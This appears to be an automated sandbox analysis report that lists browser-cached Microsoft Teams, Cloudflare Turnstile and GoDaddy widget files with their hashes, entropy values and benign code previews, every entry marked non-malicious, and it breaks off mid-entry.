                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):226512
                                                                                                                                                                                                                          Entropy (8bit):5.1293074718332825
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:4xnKeBqX6yuDTgb5W6ob04md1hDTyPRd5/xTLq0FdhsB74x1gE:45Tgbt4AhDTyPRd5c0FdhS74/Z
                                                                                                                                                                                                                          MD5:7432938A0C516DA8C09F4209F6A939C0
                                                                                                                                                                                                                          SHA1:15AEA8D8D7B1DA5339558EFF080699F07A98305E
                                                                                                                                                                                                                          SHA-256:47E6318DBF2E691516871C436C796A158B0005A36AE366F8CD5B3110D3038914
                                                                                                                                                                                                                          SHA-512:D089DDFF6277CF0FA62E1762688EE72D4AC7202471E6DCC4E53F421A8358367C0B65530DE0B94CF0E885F3EF484B88EE2E414A02A22366A303A320FD3438F8F0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/917004-31390847bfb97c52.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[917004],{122454:(e,t,a)=>{var n;a.d(t,{A:()=>c});var i=new Uint8Array(16);function o(){if(!n&&!(n="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto)))throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return n(i)}const r=/^(?:[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}|00000000-0000-0000-0000-000000000000)$/i;const _=function(e){return"string"==typeof e&&r.test(e)};for(var s=[],l=0;l<256;++l)s.push((l+256).toString(16).substr(1));const d=function(e){var t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0,a=(s[e[t+0]]+s[e[t+1]]+s[e[t+2]]+s[e[t+3]]+"-"+s[e[t+4]]+s[e[t+5]]+"-"+s[e[t+6]]+s[e[t+7]]+"-"+s[e[t+8]]+s[e[t+9]]+"-
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (56087), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):526605
                                                                                                                                                                                                                          Entropy (8bit):5.478856914597352
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:klP49EEL0p1etxMz+NZ5klPJGNyqRNwBf4xWLmACY4dupHDXLrap1:klP42ELHa+NZ5klPJGNRJYsmDX2
                                                                                                                                                                                                                          MD5:F4E78E3B8BC2E836BED1BA7CD9EF6F4F
                                                                                                                                                                                                                          SHA1:31438EA9E0B101340F769C856121F322F32E5BD3
                                                                                                                                                                                                                          SHA-256:B834544C66B0BEF90FA6676A84AA91729BCE03881A0D14140CD531CFB9A98A32
                                                                                                                                                                                                                          SHA-512:AF2210DD92344607A54D9FF72103818F0402E2F3E542B7CC882729FDC6F5489A9678338876B840BBED37993B7E0AFFD6C709B5AEF6845C6AF05F6ED33AAC8CC4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:"https://config.teams.microsoft.com/config/v1/MicrosoftTeams/1415_1.0.0.0?environment=prod&experience=react-web-client&buildType=production&virtualization=&browser=chrome&osPlatform=windows&isOcdi=false&isPwa=false&experienceBuild=24110115724&teamsLocale=en-us&sessionId=b6417000-fdc0-49cf-baa0-80c6f672aa7f&deviceId=82991ab9-d98d-4c27-aa8b-8cbc81ccf6ed&agents=TeamsNorthstar,TeamsBuilds,Segmentation&ECSCanary=1"
                                                                                                                                                                                                                          Preview:{"ECS":{"ConfigLogTarget":"default","c72ea287-ed77-4fa6-a480-3712406c367e":"aka.ms/EcsCanary"},"Segmentation":{"EliteUsers":"false","M365CopilotPPVAll":"false","M365ChatAllow":"false","EarlyR2Ring":"false","IsInternalUser":"false","VirtualizationEnabled":"false","TeamsRing":"general","MWWhilteListedUser":"false","Cloud":"Public","AudienceGroup":"general"},"TeamsBuilds":{"BuildSettings":{"MetaosStore":{"BuildVersion":"24121600700"},"WebView2PreAuth":{"x64":{"latestVersion":"24295.605.3225.8804","buildLink":"https://installer.teams.static.microsoft/production-windows-x64/24295.605.3225.8804/MSTeams-x64.msix"},"x86":{"latestVersion":"24295.605.3225.8804","buildLink":"https://installer.teams.static.microsoft/production-windows-x86/24295.605.3225.8804/MSTeams-x86.msix"},"arm64":{"latestVersion":"24295.605.3225.8804","buildLink":"https://installer.teams.static.microsoft/production-windows-arm64/24295.605.3225.8804/MSTeams-arm64.msix"}},"CustomerServiceChatbot":{"BuildVersion":"2024111101"},"
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (27783)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):27891
                                                                                                                                                                                                                          Entropy (8bit):5.439202906104346
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:gSSqn2uZfveZqHvxFdqfGNSPTRzotoNGMT5tT5GiYlWT5KT5TbVcUWA9h5D1rRyX:tf+OxtoskfFQLfrs
                                                                                                                                                                                                                          MD5:F1AA9D0B9892214B52C3AC52DF2C0DE7
                                                                                                                                                                                                                          SHA1:1E3E28897A2F8078CB3300D1CCA46B514BC0B2A9
                                                                                                                                                                                                                          SHA-256:B62E880D4D12C0CAD366CC04D9B81E6E1CAC198C00829C3AADF94634D2449368
                                                                                                                                                                                                                          SHA-512:BBCC11664D863D5992D5863FCA04BFB26C0ED5AB9AF7D6C1ED28ECBA6FA27C20DCC633DFFC5A593878A6190D154498CA28A2F05E70E4DD377A2111B947FC6A9F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/417548-aa8c7d7584ee7aca.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[417548],{485202:(t,e)=>{"use strict";e.byteLength=function(t){var e=s(t),r=e[0],n=e[1];return 3*(r+n)/4-n},e.toByteArray=function(t){var e,r,i=s(t),f=i[0],u=i[1],h=new o(function(t,e,r){return 3*(e+r)/4-r}(0,f,u)),a=0,c=u>0?f-4:f;for(r=0;r<c;r+=4)e=n[t.charCodeAt(r)]<<18|n[t.charCodeAt(r+1)]<<12|n[t.charCodeAt(r+2)]<<6|n[t.charCodeAt(r+3)],h[a++]=e>>16&255,h[a++]=e>>8&255,h[a++]=255&e;2===u&&(e=n[t.charCodeAt(r)]<<2|n[t.charCodeAt(r+1)]>>4,h[a++]=255&e);1===u&&(e=n[t.charCodeAt(r)]<<10|n[t.charCodeAt(r+1)]<<4|n[t.charCodeAt(r+2)]>>2,h[a++]=e>>8&255,h[a++]=255&e);return h},e.fromByteArray=function(t){for(var e,n=t.length,o=n%3,i=[],f=16383,s=0,h=n-o;s<h;s+=f)i.push(u(t,s,s+f>h?h:s+f));1===o?(e=t[n-1],i.push(r[e>>2]+r[e<<4&63]+"==")):2===o&&(e=(t[n-2]<<8)+t[n-1],i.push(r[e>>10]+r[e>>4&63]+r[e<<2&63]+"="));return i.join("")};for(var r=[],n=[],o="undefined"!=typeof Uint8Array?Uint8Array:Array
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (21232)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):21340
                                                                                                                                                                                                                          Entropy (8bit):5.7585955980452805
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:oyw1NskKom67NmJoZm5U6DJOTkoAPru8uA0BvkrGgmTAKd0Dfs3w:loNI3hJOTrY0BvkrXmTAKdKfsw
                                                                                                                                                                                                                          MD5:E98A29DDB910BFCFBCA3B6E6D5F1D386
                                                                                                                                                                                                                          SHA1:FAD7F04C1FA5EED36A43313430962F07BECB13FE
                                                                                                                                                                                                                          SHA-256:2F75B07E3C3ED925D2E97B334FD2BA0FE42C2B0291C3F9C1AA6AB6152AFC3296
                                                                                                                                                                                                                          SHA-512:51BB8DC7A59F707E4239DA4F96313A7018BCDFF9B051EF30A7D0914DC3C7D8195F76A32F846FE492942638B8BF8480F1BD8AE37429045C6087B62F1AF37B39C7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/795307-6e8551d9d7dca952.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[795307],{554186:(t,e,r)=>{var i=r(105117),n=r(94354),s=n;s.v1=i,s.v4=n,t.exports=s},997811:t=>{for(var e=[],r=0;r<256;++r)e[r]=(r+256).toString(16).substr(1);t.exports=function(t,r){var i=r||0,n=e;return[n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]]].join("")}},596778:t=>{var e="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(e){var r=new Uint8Array(16);t.exports=function(){return e(r),r}}else{var i=new Array(16);t.exports=function(){for(var t,e=0;e<16;e++)0==(3&e)&&(t=4294967296*Math.random()),i[e]=t>>>((3&e)<<3)&255;return i}}},105117:(t,e,r)=>{var i,n,s=r(596778),a=r(997811),o=0,I=0;t.exports=fun
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):3895900
                                                                                                                                                                                                                          Entropy (8bit):5.39232794493168
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:49152:GhoKeEA9gApAiHarj7wgx1k4pwFe0w4F2juOdHIYu5XTJUwguj1iTmFAnhKc7tkW:kFeG
                                                                                                                                                                                                                          MD5:39F0C9B578D2A20F9B62E5DF5A224332
                                                                                                                                                                                                                          SHA1:5BCD8E1E0B7D7259BB0FECC2228E2318DCA99AC5
                                                                                                                                                                                                                          SHA-256:96E8E1CDB27ACAD1F09E2F105B2BBA6ED711417599F8622754F3BC28D49B389E
                                                                                                                                                                                                                          SHA-512:DED6A03B3378269B7E4A2AF980CA7F5DE4E403721570EF3A975EB82CCFE5E3A98716A2F6AF0702F1490816A5D2FF94B6AED4ACAB0F0DEC87F1499D1858BF1F44
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/async-entry-8a5088adbb16698b.js?cb=1734456117830
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[805610],{211014:(e,t,n)=>{"use strict";n.d(t,{b:()=>i});const i=(0,n(965804).O)({isStudentAvatar:{Bf4jedk:"f1ohpo60"},isParentAvatar:{Bf4jedk:"ff9fk16"}})},516404:(e,t,n)=>{"use strict";function i(e){return'<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>','<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>'}n.d(t,{A:()=>i})},10247:(e,t,n)=>{"use strict";function i(e){var t="";Array.prototype.join;return t+="<style>\n .preload-title-bar-trim {\n ","mac"===e.osPlatform?t+="\n --preload-title-bar-background-color: rgb(98, 100, 167);\n ":t+="\n --preload-title-bar-background-color: rgb(70, 71, 117);\n ",t+='\n\n background-color: var(--preload-title-bar-bac
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):75729
                                                                                                                                                                                                                          Entropy (8bit):5.460910037528449
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:dIgGLV8OiLPwDCTx2rv59HDxrogYheDtiLDS/bz1N:dLhOtyx2b59HDJFtiqN
                                                                                                                                                                                                                          MD5:D2D1ADC30FA342C0FD93E5097327E2D4
                                                                                                                                                                                                                          SHA1:2AE9A1E70536D096878554727220A33C124A22BC
                                                                                                                                                                                                                          SHA-256:D388081E845E73805EC7FFCC94D88A1A74240460DAD4BA0602454B755983A0FF
                                                                                                                                                                                                                          SHA-512:26FDFB44AE4D2CC1B17415B7893CC75A6AE7395DF5F96DCE2C805D5D10B3631EDBACFFB33E7C94B7CC53489E9965E40A3C516C42FBBC884D08EF3795223AFD01
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/653800-bb36137dc0ad9a94.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[653800],{600093:(e,t,n)=>{var a,i;n.d(t,{d:()=>a,J:()=>i}),function(e){e.HighMemoryUsage="HighMemoryUsage",e.CallingStackInitTimeoutOrFailure="CallingStackInitTimeoutOrFailure",e.GroupCallTimeoutOrFailure="GroupCallTimeoutOrFailure"}(a||(a={})),function(e){e.MeetingsAudio="1",e.MeetingsVideoOrScreenSharing="2",e.CallingCallDrops="3",e.MessagingOther="5",e.ActivityFeed="6",e.Crashing="7",e.Files="8",e.SearchSERPSearchResultsPage="9",e.SearchPowerbarAutosuggest="10",e.Other="11",e.MeetingsLiveCaptionsOrTranscript="14",e.TeamsChannelsMembership="15",e.Accessibility="17",e.Calendar="18",e.MeetingsOther="19",e.PlatformApps="20",e.PlatformBotsConnectors="21",e.PlatformTabs="22",e.TeamsChannelsCreateManageSettings="23",e.MessagingSync="25",e.PeopleProfiles="26",e.StatusPresence="27",e.TeamsChannelsPrivateAndSharedChannels="28",e.LocalizationTranslation="29",e.MeetingsAgendaNotes="30
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (47691)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):47692
                                                                                                                                                                                                                          Entropy (8bit):5.4016459163756165
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                                                                                                                                          MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                                                                                                                                          SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                                                                                                                                          SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                                                                                                                                          SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                                                                                                                                                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (6565)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):6673
                                                                                                                                                                                                                          Entropy (8bit):5.188554109702156
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:pFI31EXqP8+2Oj31wvm3YEZUVaIBlPC9aNMM1vbLIAVJeeQ2wz0cYW9a198:pYiXMwvUZCQaac1jwz0cM1u
                                                                                                                                                                                                                          MD5:903DB9F502EF645D912B50F781960FFA
                                                                                                                                                                                                                          SHA1:50C7B1E5533C892E5C5AC0A47485C0B5C158DE78
                                                                                                                                                                                                                          SHA-256:28CD6C823E1FA6F9A6DADECD2ED9FCBD55EB1FFE831CE0A7B3952C6804B21B9C
                                                                                                                                                                                                                          SHA-512:AF378F8600F59FFA1A5C70F6FC322416B555D506A9ABDC291EE443303B66C754A84754B4BB849D53EA36DE7B1762349C6C1CC7A2D01D2A4A4F173C54A885456E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/945208-20d36298097b5d53.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[945208],{478331:(e,t)=>{var r=Symbol.for("react.element"),n=Symbol.for("react.portal"),o=Symbol.for("react.fragment"),u=Symbol.for("react.strict_mode"),a=Symbol.for("react.profiler"),c=Symbol.for("react.provider"),i=Symbol.for("react.context"),f=Symbol.for("react.forward_ref"),s=Symbol.for("react.suspense"),l=Symbol.for("react.memo"),p=Symbol.for("react.lazy"),y=Symbol.iterator;var d={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},_=Object.assign,h={};function m(e,t,r){this.props=e,this.context=t,this.refs=h,this.updater=r||d}function b(){}function v(e,t,r){this.props=e,this.context=t,this.refs=h,this.updater=r||d}m.prototype.isReactComponent={},m.prototype.setState=function(e,t){if("object"!=typeof e&&"function"!=typeof e&&null!=e)throw Error("setState(...): takes an object of state variables to u
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (13834)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):13891
                                                                                                                                                                                                                          Entropy (8bit):4.645788246161265
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:49+DrRmRAiyq602NNTV0afQQYrAJ9wzkENGWHl2JBpfodMjHJv8k9fopl1jn:4Bp49ykE8WQs2Vv8k9fGTjn
                                                                                                                                                                                                                          MD5:C7B1DBB0EEF8600D5F57536998855E4D
                                                                                                                                                                                                                          SHA1:03908243C34D5A373ACBA694EB16E30F088B4F7D
                                                                                                                                                                                                                          SHA-256:53DA7DD341F1EF0C484A7B56A17D86669287DA5D082AAA8A0AF04FD3816B6631
                                                                                                                                                                                                                          SHA-512:56EE4961F4C03A15C79252AD9C3CAD93573AC785881541EA32F83389996F4E8C074FBC397FF9F0B218121A3D8E1A9CEF101D088B4BCFB2353D6A311D5F60DCBA
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-modernThinRound-ced97fbd.js
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-modernThinRound-ced97fbd.js",["exports"],(function(e){"use strict";const a=(global.React||guac.react).createElement("path",{fillRule:"evenodd",d:"M5.643 19.241a.782.782 0 0 1-.634-.889c.317-2.142 1.62-4.188 3.525-5.244l.459-.254-.39-.352a4.89 4.89 0 0 1-.797-6.327 4.747 4.747 0 0 1 2.752-2.003 4.894 4.894 0 0 1 6.092 5.72c-.211 1.042-.802 1.97-1.59 2.683l-.308.28.459.253c1.876 1.04 3.185 3.131 3.53 5.26a.765.765 0 0 1-.742.883c-.367.005-.697-.25-.753-.613-.52-3.384-4.067-6.087-7.702-4.324-1.628.79-2.714 2.511-3.014 4.313a.76.76 0 0 1-.887.614zm2.873-10.36a3.36 3.36 0 0 0 3.356 3.355A3.36 3.36 0 0 0 15.23 8.88a3.361 3.361 0 0 0-3.358-3.357A3.36 3.36 0 0 0 8.516 8.88z"});var l={__proto__:null,account:a,person:a,magGlass:(global.React||guac.react).createElement("path",{fillRule:"evenodd",d:"M19.504 18.461a.76.76 0 0 1 0 1.038.652.652 0 0 1-.956 0L15.2 15.993a6.142 6.142 0 0 1-3.83 1.353C7.858 17.346 5 14.353 5 10.673 5 6.994 7.858 4 11.371 4c3.513 0 6.371 2.994
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (19613)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19721
                                                                                                                                                                                                                          Entropy (8bit):5.343521820857181
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:i4A/8Siva3/i3RrXxLXY0SQw2XMaeZhrDPuTFi9u5yHfdUsYUnseOrQbDz:Dvi/inXBXMTZpURdS9z
                                                                                                                                                                                                                          MD5:C86832ABA19643DA044A61F0121FC06A
                                                                                                                                                                                                                          SHA1:A44017135CF79D42AAE4E617DD23EB82581DAEA2
                                                                                                                                                                                                                          SHA-256:8835A3F9BF4B64E64A7A9ED20D3C9E5EF3B791C3C80776D644CDD63DE9AA4558
                                                                                                                                                                                                                          SHA-512:67E319B01367F2924520272DF1C9A54EB6D483E6CF064561FE0E4B6C2C55779434C6D574C5B624EFF81D32BDC5A415759B8FE477E7605187145BEC38F747E941
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[914945],{593279:(e,n,t)=>{t.d(n,{i:()=>a});var r=t(888846),i=t(240364),o=t(504158),a=function(e){return{attributes:{root:{role:"menu"}},focusZone:{props:{isCircularNavigation:!0,shouldFocusInnerElementWhenReceivedFocus:!0,direction:e.vertical?r.E.vertical:r.E.horizontal}},childBehaviors:{item:i.b,divider:o.d}}}},504158:(e,n,t)=>{t.d(n,{d:()=>r});var r=function(){return{attributes:{root:{role:"presentation"}}}}},240364:(e,n,t)=>{t.d(n,{b:()=>o});var r=t(953543),i=t(504405),o=function(e){var n;return{attributes:{wrapper:{role:"presentation"},root:(n={role:"menuitem",tabIndex:0,"aria-expanded":e.hasMenu?e.menuOpen||!1:void 0,"aria-haspopup":e.hasMenu?"true":void 0,"aria-label":e["aria-label"],"aria-labelledby":e["aria-labelledby"],"aria-describedby":e["aria-describedby"],"aria-disabled":e.disabled},n[i.P]=!0,n)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:r.rC.Ente
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):525927
                                                                                                                                                                                                                          Entropy (8bit):5.4788017414323065
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:/1etxMz+NZ5klPJGNyqRNwBf4xWLmACY4dupHDXLrapLlP49EEL0Z:Ca+NZ5klPJGNRJYsmDXwlP42ELG
                                                                                                                                                                                                                          MD5:525785489E705BBA7079597262C0BF3A
                                                                                                                                                                                                                          SHA1:726D7DE3ACAFD11E1D45D496E74A54B3F94FFFC8
                                                                                                                                                                                                                          SHA-256:5CD9E78CA7C9DCB8C6B8680ACE71B12C28A30815F33CC1DFA955EE6ED0676724
                                                                                                                                                                                                                          SHA-512:56ACA5F1BCD1ED89B99EA92D5DF42CB99F3513E7913E4BA83DF684C1AFAC1039AA3F1EDD076B60A23099984AD799350968823139AD2871BA08419A720C4DDC03
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:{"ECS":{"ConfigLogTarget":"default","c72ea287-ed77-4fa6-a480-3712406c367e":"aka.ms/EcsCanary"},"Segmentation":{"EliteUsers":"false","M365CopilotPPVAll":"false","M365ChatAllow":"false","EarlyR2Ring":"false","IsInternalUser":"false","VirtualizationEnabled":"false","TeamsRing":"general","MWWhilteListedUser":"false","Cloud":"Public","AudienceGroup":"general"},"TeamsBuilds":{"BuildSettings":{"MetaosStore":{"BuildVersion":"24121600700"},"WebView2PreAuth":{"x64":{"latestVersion":"24295.605.3225.8804","buildLink":"https://installer.teams.static.microsoft/production-windows-x64/24295.605.3225.8804/MSTeams-x64.msix"},"x86":{"latestVersion":"24295.605.3225.8804","buildLink":"https://installer.teams.static.microsoft/production-windows-x86/24295.605.3225.8804/MSTeams-x86.msix"},"arm64":{"latestVersion":"24295.605.3225.8804","buildLink":"https://installer.teams.static.microsoft/production-windows-arm64/24295.605.3225.8804/MSTeams-arm64.msix"}},"CustomerServiceChatbot":{"BuildVersion":"2024111101"},"
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 19x21, components 3
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):669
                                                                                                                                                                                                                          Entropy (8bit):5.687700387379596
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:SPb3SkEl9qvc150XyoseWlwqTIB5aSAgoPq7Z2TF8:/l8vc1spWJIDaRxG
                                                                                                                                                                                                                          MD5:3A6D11202EF8909AFDB634F33997F45C
                                                                                                                                                                                                                          SHA1:71C160699266293EFDFC308DC87F03C2B3E39A62
                                                                                                                                                                                                                          SHA-256:3B943E8B80AB9EE7FD4FB040BFB274F8FBE44A3FB33087A13B06DB74E3C316F8
                                                                                                                                                                                                                          SHA-512:4318169AC5F7047F85771DAD9DD34F50BC5CAD2815329027C80CA7C77FEB35F8C7B7F001390C4CBA928D3EED0830A417EBEA2327F6EE795E7270B23C044D8AC6
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......8c......8c................0210....................0100...........................................C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".....................................+........................!."1...#$BCSt...............................)........................!....QARSr.................?.....x....z.b...@:..#.1x.....`........d.Ii..A..t..r.....L.......l..z..'k.z..4.3&..8R..gdv.s.UM..e.'}......=....z.`.....J.W9....EZ.\S.[..(...F...... ...q_..
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (40348)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):40455
                                                                                                                                                                                                                          Entropy (8bit):4.981394252256148
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:fnQ86Ufu2oo9KiHjtwTV0ayEwiT1U7lPFYeJ4Z02dWAyGPORt1PnV6gPnn4PFKM2:mUfu2oo9KCt1lgdWAyGPOdPnn+YTB
                                                                                                                                                                                                                          MD5:E36FE8288B6CC5FB216E1821E77BAD47
                                                                                                                                                                                                                          SHA1:0A718845E742538C25C859F2AD0CCB2E7AF4DE5F
                                                                                                                                                                                                                          SHA-256:9A01B2E8807963179A99AC8E6B5DA79A32CB33D9EE206B02EEA1893AC79FDA37
